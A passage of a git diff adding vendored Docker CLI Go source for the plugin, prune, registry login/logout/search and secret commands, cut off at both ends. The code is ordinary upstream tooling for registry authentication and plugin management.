distreference.Named) (*registrytypes.IndexInfo, error) { + named, err := reference.ParseNamed(ref.Name()) + if err != nil { + return nil, err + } + + repoInfo, err := registry.ParseRepositoryInfo(named) + if err != nil { + return nil, err + } + + return repoInfo.Index, nil +} + +type pluginRegistryService struct { + registry.Service +} + +func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) { + repoInfo, err = s.Service.ResolveRepository(name) + if repoInfo != nil { + repoInfo.Class = "plugin" + } + return +} + +func newRegistryService() registry.Service { + return pluginRegistryService{ + Service: registry.NewService(registry.ServiceOptions{V2Only: true}), + } +} + +func buildPullConfig(ctx context.Context, dockerCli *command.DockerCli, opts pluginOptions, cmdName string) (types.PluginInstallOptions, error) { + // Parse name using distribution reference package to support name + // containing both tag and digest. Names with both tag and digest + // will be treated by the daemon as a pull by digest with + // an alias for the tag (if no alias is provided). 
+ ref, err := distreference.ParseNamed(opts.remote) + if err != nil { + return types.PluginInstallOptions{}, err + } + + index, err := getRepoIndexFromUnnormalizedRef(ref) + if err != nil { + return types.PluginInstallOptions{}, err + } + + repoInfoIndex, err := getRepoIndexFromUnnormalizedRef(ref) + if err != nil { + return types.PluginInstallOptions{}, err + } + remote := ref.String() + + _, isCanonical := ref.(distreference.Canonical) + if command.IsTrusted() && !isCanonical { + var nt reference.NamedTagged + named, err := reference.ParseNamed(ref.Name()) + if err != nil { + return types.PluginInstallOptions{}, err + } + if tagged, ok := ref.(distreference.Tagged); ok { + nt, err = reference.WithTag(named, tagged.Tag()) + if err != nil { + return types.PluginInstallOptions{}, err + } + } else { + named = reference.WithDefaultTag(named) + nt = named.(reference.NamedTagged) + } + + ctx := context.Background() + trusted, err := image.TrustedReference(ctx, dockerCli, nt, newRegistryService()) + if err != nil { + return types.PluginInstallOptions{}, err + } + remote = trusted.String() + } + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, index) + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return types.PluginInstallOptions{}, err + } + + registryAuthFunc := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfoIndex, cmdName) + + options := types.PluginInstallOptions{ + RegistryAuth: encodedAuth, + RemoteRef: remote, + Disabled: opts.disable, + AcceptAllPermissions: opts.grantPerms, + AcceptPermissionsFunc: acceptPrivileges(dockerCli, opts.remote), + // TODO: Rename PrivilegeFunc, it has nothing to do with privileges + PrivilegeFunc: registryAuthFunc, + Args: opts.args, + } + return options, nil +} + +func runInstall(dockerCli *command.DockerCli, opts pluginOptions) error { + var localName string + if opts.localName != "" { + aref, err := reference.ParseNamed(opts.localName) + if err != nil { + return err + } + 
aref = reference.WithDefaultTag(aref) + if _, ok := aref.(reference.NamedTagged); !ok { + return fmt.Errorf("invalid name: %s", opts.localName) + } + localName = aref.String() + } + + ctx := context.Background() + options, err := buildPullConfig(ctx, dockerCli, opts, "plugin install") + if err != nil { + return err + } + responseBody, err := dockerCli.Client().PluginInstall(ctx, localName, options) + if err != nil { + if strings.Contains(err.Error(), "target is image") { + return errors.New(err.Error() + " - Use `docker image pull`") + } + return err + } + defer responseBody.Close() + if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "Installed plugin %s\n", opts.remote) // todo: return proper values from the API for this result + return nil +} + +func acceptPrivileges(dockerCli *command.DockerCli, name string) func(privileges types.PluginPrivileges) (bool, error) { + return func(privileges types.PluginPrivileges) (bool, error) { + fmt.Fprintf(dockerCli.Out(), "Plugin %q is requesting the following privileges:\n", name) + for _, privilege := range privileges { + fmt.Fprintf(dockerCli.Out(), " - %s: %v\n", privilege.Name, privilege.Value) + } + + fmt.Fprint(dockerCli.Out(), "Do you grant the above permissions? 
[y/N] ") + reader := bufio.NewReader(dockerCli.In()) + line, _, err := reader.ReadLine() + if err != nil { + return false, err + } + return strings.ToLower(string(line)) == "y", nil + } +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/list.go b/vendor/github.com/docker/docker/cli/command/plugin/list.go new file mode 100644 index 0000000000..8fd16dae3f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/list.go @@ -0,0 +1,63 @@ +package plugin + +import ( + "fmt" + "strings" + "text/tabwriter" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type listOptions struct { + noTrunc bool +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts listOptions + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Short: "List plugins", + Aliases: []string{"list"}, + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + plugins, err := dockerCli.Client().PluginList(context.Background()) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + fmt.Fprintf(w, "ID \tNAME \tDESCRIPTION\tENABLED") + fmt.Fprintf(w, "\n") + + for _, p := range plugins { + id := p.ID + desc := strings.Replace(p.Config.Description, "\n", " ", -1) + desc = strings.Replace(desc, "\r", " ", -1) + if !opts.noTrunc { + id = stringid.TruncateID(p.ID) + desc = stringutils.Ellipsis(desc, 45) + } + + fmt.Fprintf(w, "%s\t%s\t%s\t%v\n", id, p.Name, desc, p.Enabled) + } + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/push.go 
b/vendor/github.com/docker/docker/cli/command/plugin/push.go new file mode 100644 index 0000000000..9abb38ec0b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/push.go @@ -0,0 +1,71 @@ +package plugin + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +func newPushCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "push [OPTIONS] PLUGIN[:TAG]", + Short: "Push a plugin to a registry", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runPush(dockerCli, args[0]) + }, + } + + flags := cmd.Flags() + + command.AddTrustedFlags(flags, true) + + return cmd +} + +func runPush(dockerCli *command.DockerCli, name string) error { + named, err := reference.ParseNamed(name) // FIXME: validate + if err != nil { + return err + } + if reference.IsNameOnly(named) { + named = reference.WithDefaultTag(named) + } + ref, ok := named.(reference.NamedTagged) + if !ok { + return fmt.Errorf("invalid name: %s", named.String()) + } + + ctx := context.Background() + + repoInfo, err := registry.ParseRepositoryInfo(named) + if err != nil { + return err + } + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + responseBody, err := dockerCli.Client().PluginPush(ctx, ref.String(), encodedAuth) + if err != nil { + return err + } + defer responseBody.Close() + + if command.IsTrusted() { + repoInfo.Class = "plugin" + return image.PushTrustedReference(dockerCli, repoInfo, named, authConfig, responseBody) + } + + return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) +} diff --git 
a/vendor/github.com/docker/docker/cli/command/plugin/remove.go b/vendor/github.com/docker/docker/cli/command/plugin/remove.go new file mode 100644 index 0000000000..9f3aba9a01 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/remove.go @@ -0,0 +1,55 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type rmOptions struct { + force bool + + plugins []string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts rmOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] PLUGIN [PLUGIN...]", + Short: "Remove one or more plugins", + Aliases: []string{"remove"}, + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.plugins = args + return runRemove(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of an active plugin") + return cmd +} + +func runRemove(dockerCli *command.DockerCli, opts *rmOptions) error { + ctx := context.Background() + + var errs cli.Errors + for _, name := range opts.plugins { + // TODO: pass names to api instead of making multiple api calls + if err := dockerCli.Client().PluginRemove(ctx, name, types.PluginRemoveOptions{Force: opts.force}); err != nil { + errs = append(errs, err) + continue + } + fmt.Fprintln(dockerCli.Out(), name) + } + // Do not simplify to `return errs` because even if errs == nil, it is not a nil-error interface value. 
+ if errs != nil { + return errs + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/set.go b/vendor/github.com/docker/docker/cli/command/plugin/set.go new file mode 100644 index 0000000000..52b09fb500 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/set.go @@ -0,0 +1,22 @@ +package plugin + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newSetCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "set PLUGIN KEY=VALUE [KEY=VALUE...]", + Short: "Change settings for a plugin", + Args: cli.RequiresMinArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + return dockerCli.Client().PluginSet(context.Background(), args[0], args[1:]) + }, + } + + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go new file mode 100644 index 0000000000..d212cd7e52 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go @@ -0,0 +1,100 @@ +package plugin + +import ( + "bufio" + "context" + "fmt" + "strings" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/docker/docker/reference" + "github.com/pkg/errors" + "github.com/spf13/cobra" +) + +func newUpgradeCommand(dockerCli *command.DockerCli) *cobra.Command { + var options pluginOptions + cmd := &cobra.Command{ + Use: "upgrade [OPTIONS] PLUGIN [REMOTE]", + Short: "Upgrade an existing plugin", + Args: cli.RequiresRangeArgs(1, 2), + RunE: func(cmd *cobra.Command, args []string) error { + options.localName = args[0] + if len(args) == 2 { + options.remote = args[1] + } + return runUpgrade(dockerCli, options) + }, + } + + flags := cmd.Flags() + loadPullFlags(&options, flags) + flags.BoolVar(&options.skipRemoteCheck, "skip-remote-check", 
false, "Do not check if specified remote plugin matches existing plugin image") + return cmd +} + +func runUpgrade(dockerCli *command.DockerCli, opts pluginOptions) error { + ctx := context.Background() + p, _, err := dockerCli.Client().PluginInspectWithRaw(ctx, opts.localName) + if err != nil { + return fmt.Errorf("error reading plugin data: %v", err) + } + + if p.Enabled { + return fmt.Errorf("the plugin must be disabled before upgrading") + } + + opts.localName = p.Name + if opts.remote == "" { + opts.remote = p.PluginReference + } + remote, err := reference.ParseNamed(opts.remote) + if err != nil { + return errors.Wrap(err, "error parsing remote upgrade image reference") + } + remote = reference.WithDefaultTag(remote) + + old, err := reference.ParseNamed(p.PluginReference) + if err != nil { + return errors.Wrap(err, "error parsing current image reference") + } + old = reference.WithDefaultTag(old) + + fmt.Fprintf(dockerCli.Out(), "Upgrading plugin %s from %s to %s\n", p.Name, old, remote) + if !opts.skipRemoteCheck && remote.String() != old.String() { + _, err := fmt.Fprint(dockerCli.Out(), "Plugin images do not match, are you sure? 
") + if err != nil { + return errors.Wrap(err, "error writing to stdout") + } + + rdr := bufio.NewReader(dockerCli.In()) + line, _, err := rdr.ReadLine() + if err != nil { + return errors.Wrap(err, "error reading from stdin") + } + if strings.ToLower(string(line)) != "y" { + return errors.New("canceling upgrade request") + } + } + + options, err := buildPullConfig(ctx, dockerCli, opts, "plugin upgrade") + if err != nil { + return err + } + + responseBody, err := dockerCli.Client().PluginUpgrade(ctx, opts.localName, options) + if err != nil { + if strings.Contains(err.Error(), "target is image") { + return errors.New(err.Error() + " - Use `docker image pull`") + } + return err + } + defer responseBody.Close() + if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "Upgraded plugin %s to %s\n", opts.localName, opts.remote) // todo: return proper values from the API for this result + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/prune/prune.go b/vendor/github.com/docker/docker/cli/command/prune/prune.go new file mode 100644 index 0000000000..a022487fd6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/prune/prune.go @@ -0,0 +1,50 @@ +package prune + +import ( + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/container" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/cli/command/network" + "github.com/docker/docker/cli/command/volume" + "github.com/spf13/cobra" +) + +// NewContainerPruneCommand returns a cobra prune command for containers +func NewContainerPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return container.NewPruneCommand(dockerCli) +} + +// NewVolumePruneCommand returns a cobra prune command for volumes +func NewVolumePruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return volume.NewPruneCommand(dockerCli) +} + +// NewImagePruneCommand 
returns a cobra prune command for images +func NewImagePruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return image.NewPruneCommand(dockerCli) +} + +// NewNetworkPruneCommand returns a cobra prune command for Networks +func NewNetworkPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + return network.NewPruneCommand(dockerCli) +} + +// RunContainerPrune executes a prune command for containers +func RunContainerPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return container.RunPrune(dockerCli) +} + +// RunVolumePrune executes a prune command for volumes +func RunVolumePrune(dockerCli *command.DockerCli) (uint64, string, error) { + return volume.RunPrune(dockerCli) +} + +// RunImagePrune executes a prune command for images +func RunImagePrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { + return image.RunPrune(dockerCli, all) +} + +// RunNetworkPrune executes a prune command for networks +func RunNetworkPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return network.RunPrune(dockerCli) +} diff --git a/vendor/github.com/docker/docker/cli/command/registry.go b/vendor/github.com/docker/docker/cli/command/registry.go new file mode 100644 index 0000000000..65f6b3309e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry.go @@ -0,0 +1,186 @@ +package command + +import ( + "bufio" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "os" + "runtime" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/pkg/term" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" +) + +// ElectAuthServer returns the default registry to use (by asking the daemon) +func ElectAuthServer(ctx context.Context, cli *DockerCli) string { + // The daemon `/info` endpoint informs us of the default registry being + // used. 
This is essential in cross-platforms environment, where for + // example a Linux client might be interacting with a Windows daemon, hence + // the default registry URL might be Windows specific. + serverAddress := registry.IndexServer + if info, err := cli.Client().Info(ctx); err != nil { + fmt.Fprintf(cli.Out(), "Warning: failed to get default registry endpoint from daemon (%v). Using system default: %s\n", err, serverAddress) + } else { + serverAddress = info.IndexServerAddress + } + return serverAddress +} + +// EncodeAuthToBase64 serializes the auth configuration as JSON base64 payload +func EncodeAuthToBase64(authConfig types.AuthConfig) (string, error) { + buf, err := json.Marshal(authConfig) + if err != nil { + return "", err + } + return base64.URLEncoding.EncodeToString(buf), nil +} + +// RegistryAuthenticationPrivilegedFunc returns a RequestPrivilegeFunc from the specified registry index info +// for the given command. +func RegistryAuthenticationPrivilegedFunc(cli *DockerCli, index *registrytypes.IndexInfo, cmdName string) types.RequestPrivilegeFunc { + return func() (string, error) { + fmt.Fprintf(cli.Out(), "\nPlease login prior to %s:\n", cmdName) + indexServer := registry.GetAuthConfigKey(index) + isDefaultRegistry := indexServer == ElectAuthServer(context.Background(), cli) + authConfig, err := ConfigureAuth(cli, "", "", indexServer, isDefaultRegistry) + if err != nil { + return "", err + } + return EncodeAuthToBase64(authConfig) + } +} + +// ResolveAuthConfig is like registry.ResolveAuthConfig, but if using the +// default index, it uses the default index name for the daemon's platform, +// not the client's platform. 
+func ResolveAuthConfig(ctx context.Context, cli *DockerCli, index *registrytypes.IndexInfo) types.AuthConfig { + configKey := index.Name + if index.Official { + configKey = ElectAuthServer(ctx, cli) + } + + a, _ := cli.CredentialsStore(configKey).Get(configKey) + return a +} + +// ConfigureAuth returns an AuthConfig from the specified user, password and server. +func ConfigureAuth(cli *DockerCli, flUser, flPassword, serverAddress string, isDefaultRegistry bool) (types.AuthConfig, error) { + // On Windows, force the use of the regular OS stdin stream. Fixes #14336/#14210 + if runtime.GOOS == "windows" { + cli.in = NewInStream(os.Stdin) + } + + if !isDefaultRegistry { + serverAddress = registry.ConvertToHostname(serverAddress) + } + + authconfig, err := cli.CredentialsStore(serverAddress).Get(serverAddress) + if err != nil { + return authconfig, err + } + + // Some links documenting this: + // - https://code.google.com/archive/p/mintty/issues/56 + // - https://github.com/docker/docker/issues/15272 + // - https://mintty.github.io/ (compatibility) + // Linux will hit this if you attempt `cat | docker login`, and Windows + // will hit this if you attempt docker login from mintty where stdin + // is a pipe, not a character based console. + if flPassword == "" && !cli.In().IsTerminal() { + return authconfig, fmt.Errorf("Error: Cannot perform an interactive login from a non TTY device") + } + + authconfig.Username = strings.TrimSpace(authconfig.Username) + + if flUser = strings.TrimSpace(flUser); flUser == "" { + if isDefaultRegistry { + // if this is a default registry (docker hub), then display the following message. + fmt.Fprintln(cli.Out(), "Login with your Docker ID to push and pull images from Docker Hub. 
If you don't have a Docker ID, head over to https://hub.docker.com to create one.") + } + promptWithDefault(cli.Out(), "Username", authconfig.Username) + flUser = readInput(cli.In(), cli.Out()) + flUser = strings.TrimSpace(flUser) + if flUser == "" { + flUser = authconfig.Username + } + } + if flUser == "" { + return authconfig, fmt.Errorf("Error: Non-null Username Required") + } + if flPassword == "" { + oldState, err := term.SaveState(cli.In().FD()) + if err != nil { + return authconfig, err + } + fmt.Fprintf(cli.Out(), "Password: ") + term.DisableEcho(cli.In().FD(), oldState) + + flPassword = readInput(cli.In(), cli.Out()) + fmt.Fprint(cli.Out(), "\n") + + term.RestoreTerminal(cli.In().FD(), oldState) + if flPassword == "" { + return authconfig, fmt.Errorf("Error: Password Required") + } + } + + authconfig.Username = flUser + authconfig.Password = flPassword + authconfig.ServerAddress = serverAddress + authconfig.IdentityToken = "" + + return authconfig, nil +} + +func readInput(in io.Reader, out io.Writer) string { + reader := bufio.NewReader(in) + line, _, err := reader.ReadLine() + if err != nil { + fmt.Fprintln(out, err.Error()) + os.Exit(1) + } + return string(line) +} + +func promptWithDefault(out io.Writer, prompt string, configDefault string) { + if configDefault == "" { + fmt.Fprintf(out, "%s: ", prompt) + } else { + fmt.Fprintf(out, "%s (%s): ", prompt, configDefault) + } +} + +// RetrieveAuthTokenFromImage retrieves an encoded auth token given a complete image +func RetrieveAuthTokenFromImage(ctx context.Context, cli *DockerCli, image string) (string, error) { + // Retrieve encoded auth token from the image reference + authConfig, err := resolveAuthConfigFromImage(ctx, cli, image) + if err != nil { + return "", err + } + encodedAuth, err := EncodeAuthToBase64(authConfig) + if err != nil { + return "", err + } + return encodedAuth, nil +} + +// resolveAuthConfigFromImage retrieves that AuthConfig using the image string +func 
resolveAuthConfigFromImage(ctx context.Context, cli *DockerCli, image string) (types.AuthConfig, error) { + registryRef, err := reference.ParseNamed(image) + if err != nil { + return types.AuthConfig{}, err + } + repoInfo, err := registry.ParseRepositoryInfo(registryRef) + if err != nil { + return types.AuthConfig{}, err + } + return ResolveAuthConfig(ctx, cli, repoInfo.Index), nil +} diff --git a/vendor/github.com/docker/docker/cli/command/registry/login.go b/vendor/github.com/docker/docker/cli/command/registry/login.go new file mode 100644 index 0000000000..05b3bb03b2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry/login.go @@ -0,0 +1,85 @@ +package registry + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type loginOptions struct { + serverAddress string + user string + password string + email string +} + +// NewLoginCommand creates a new `docker login` command +func NewLoginCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts loginOptions + + cmd := &cobra.Command{ + Use: "login [OPTIONS] [SERVER]", + Short: "Log in to a Docker registry", + Long: "Log in to a Docker registry.\nIf no server is specified, the default is defined by the daemon.", + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + if len(args) > 0 { + opts.serverAddress = args[0] + } + return runLogin(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.user, "username", "u", "", "Username") + flags.StringVarP(&opts.password, "password", "p", "", "Password") + + // Deprecated in 1.11: Should be removed in docker 1.14 + flags.StringVarP(&opts.email, "email", "e", "", "Email") + flags.MarkDeprecated("email", "will be removed in 1.14.") + + return cmd +} + +func runLogin(dockerCli *command.DockerCli, opts loginOptions) error { + ctx := context.Background() + clnt := dockerCli.Client() + + var 
( + serverAddress string + authServer = command.ElectAuthServer(ctx, dockerCli) + ) + if opts.serverAddress != "" { + serverAddress = opts.serverAddress + } else { + serverAddress = authServer + } + + isDefaultRegistry := serverAddress == authServer + + authConfig, err := command.ConfigureAuth(dockerCli, opts.user, opts.password, serverAddress, isDefaultRegistry) + if err != nil { + return err + } + response, err := clnt.RegistryLogin(ctx, authConfig) + if err != nil { + return err + } + if response.IdentityToken != "" { + authConfig.Password = "" + authConfig.IdentityToken = response.IdentityToken + } + if err := dockerCli.CredentialsStore(serverAddress).Store(authConfig); err != nil { + return fmt.Errorf("Error saving credentials: %v", err) + } + + if response.Status != "" { + fmt.Fprintln(dockerCli.Out(), response.Status) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/registry/logout.go b/vendor/github.com/docker/docker/cli/command/registry/logout.go new file mode 100644 index 0000000000..877e60e8cc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry/logout.go @@ -0,0 +1,77 @@ +package registry + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +// NewLogoutCommand creates a new `docker login` command +func NewLogoutCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "logout [SERVER]", + Short: "Log out from a Docker registry", + Long: "Log out from a Docker registry.\nIf no server is specified, the default is defined by the daemon.", + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + var serverAddress string + if len(args) > 0 { + serverAddress = args[0] + } + return runLogout(dockerCli, serverAddress) + }, + } + + return cmd +} + +func runLogout(dockerCli *command.DockerCli, serverAddress 
string) error { + ctx := context.Background() + var isDefaultRegistry bool + + if serverAddress == "" { + serverAddress = command.ElectAuthServer(ctx, dockerCli) + isDefaultRegistry = true + } + + var ( + loggedIn bool + regsToLogout []string + hostnameAddress = serverAddress + regsToTry = []string{serverAddress} + ) + if !isDefaultRegistry { + hostnameAddress = registry.ConvertToHostname(serverAddress) + // the tries below are kept for backward compatibility where a user could have + // saved the registry in one of the following format. + regsToTry = append(regsToTry, hostnameAddress, "http://"+hostnameAddress, "https://"+hostnameAddress) + } + + // check if we're logged in based on the records in the config file + // which means it couldn't have user/pass cause they may be in the creds store + for _, s := range regsToTry { + if _, ok := dockerCli.ConfigFile().AuthConfigs[s]; ok { + loggedIn = true + regsToLogout = append(regsToLogout, s) + } + } + + if !loggedIn { + fmt.Fprintf(dockerCli.Out(), "Not logged in to %s\n", hostnameAddress) + return nil + } + + fmt.Fprintf(dockerCli.Out(), "Removing login credentials for %s\n", hostnameAddress) + for _, r := range regsToLogout { + if err := dockerCli.CredentialsStore(r).Erase(r); err != nil { + fmt.Fprintf(dockerCli.Err(), "WARNING: could not erase credentials: %v\n", err) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/registry/search.go b/vendor/github.com/docker/docker/cli/command/registry/search.go new file mode 100644 index 0000000000..124b4ae6cc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/registry/search.go @@ -0,0 +1,126 @@ +package registry + +import ( + "fmt" + "sort" + "strings" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + 
"github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/registry" + "github.com/spf13/cobra" +) + +type searchOptions struct { + term string + noTrunc bool + limit int + filter opts.FilterOpt + + // Deprecated + stars uint + automated bool +} + +// NewSearchCommand creates a new `docker search` command +func NewSearchCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := searchOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "search [OPTIONS] TERM", + Short: "Search the Docker Hub for images", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.term = args[0] + return runSearch(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + flags.IntVar(&opts.limit, "limit", registry.DefaultSearchLimit, "Max number of search results") + + flags.BoolVar(&opts.automated, "automated", false, "Only show automated builds") + flags.UintVarP(&opts.stars, "stars", "s", 0, "Only displays with at least x stars") + + flags.MarkDeprecated("automated", "use --filter=automated=true instead") + flags.MarkDeprecated("stars", "use --filter=stars=3 instead") + + return cmd +} + +func runSearch(dockerCli *command.DockerCli, opts searchOptions) error { + indexInfo, err := registry.ParseSearchIndexInfo(opts.term) + if err != nil { + return err + } + + ctx := context.Background() + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, indexInfo) + requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, indexInfo, "search") + + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + + options := types.ImageSearchOptions{ + RegistryAuth: encodedAuth, + PrivilegeFunc: requestPrivilege, + Filters: opts.filter.Value(), + Limit: opts.limit, + } + + clnt := dockerCli.Client() + + unorderedResults, 
err := clnt.ImageSearch(ctx, opts.term, options) + if err != nil { + return err + } + + results := searchResultsByStars(unorderedResults) + sort.Sort(results) + + w := tabwriter.NewWriter(dockerCli.Out(), 10, 1, 3, ' ', 0) + fmt.Fprintf(w, "NAME\tDESCRIPTION\tSTARS\tOFFICIAL\tAUTOMATED\n") + for _, res := range results { + // --automated and -s, --stars are deprecated since Docker 1.12 + if (opts.automated && !res.IsAutomated) || (int(opts.stars) > res.StarCount) { + continue + } + desc := strings.Replace(res.Description, "\n", " ", -1) + desc = strings.Replace(desc, "\r", " ", -1) + if !opts.noTrunc { + desc = stringutils.Ellipsis(desc, 45) + } + fmt.Fprintf(w, "%s\t%s\t%d\t", res.Name, desc, res.StarCount) + if res.IsOfficial { + fmt.Fprint(w, "[OK]") + + } + fmt.Fprint(w, "\t") + if res.IsAutomated { + fmt.Fprint(w, "[OK]") + } + fmt.Fprint(w, "\n") + } + w.Flush() + return nil +} + +// SearchResultsByStars sorts search results in descending order by number of stars. +type searchResultsByStars []registrytypes.SearchResult + +func (r searchResultsByStars) Len() int { return len(r) } +func (r searchResultsByStars) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r searchResultsByStars) Less(i, j int) bool { return r[j].StarCount < r[i].StarCount } diff --git a/vendor/github.com/docker/docker/cli/command/secret/cmd.go b/vendor/github.com/docker/docker/cli/command/secret/cmd.go new file mode 100644 index 0000000000..79e669858c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/cmd.go @@ -0,0 +1,25 @@ +package secret + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewSecretCommand returns a cobra command for `secret` subcommands +func NewSecretCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "secret", + Short: "Manage Docker secrets", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + 
newSecretListCommand(dockerCli), + newSecretCreateCommand(dockerCli), + newSecretInspectCommand(dockerCli), + newSecretRemoveCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/secret/create.go b/vendor/github.com/docker/docker/cli/command/secret/create.go new file mode 100644 index 0000000000..f4683a60f5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/secret/create.go @@ -0,0 +1,79 @@ +package secret + +import ( + "fmt" + "io" + "io/ioutil" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/system" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type createOptions struct { + name string + file string + labels opts.ListOpts +} + +func newSecretCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + createOpts := createOptions{ + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + } + + cmd := &cobra.Command{ + Use: "create [OPTIONS] SECRET file|-", + Short: "Create a secret from a file or STDIN as content", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + createOpts.name = args[0] + 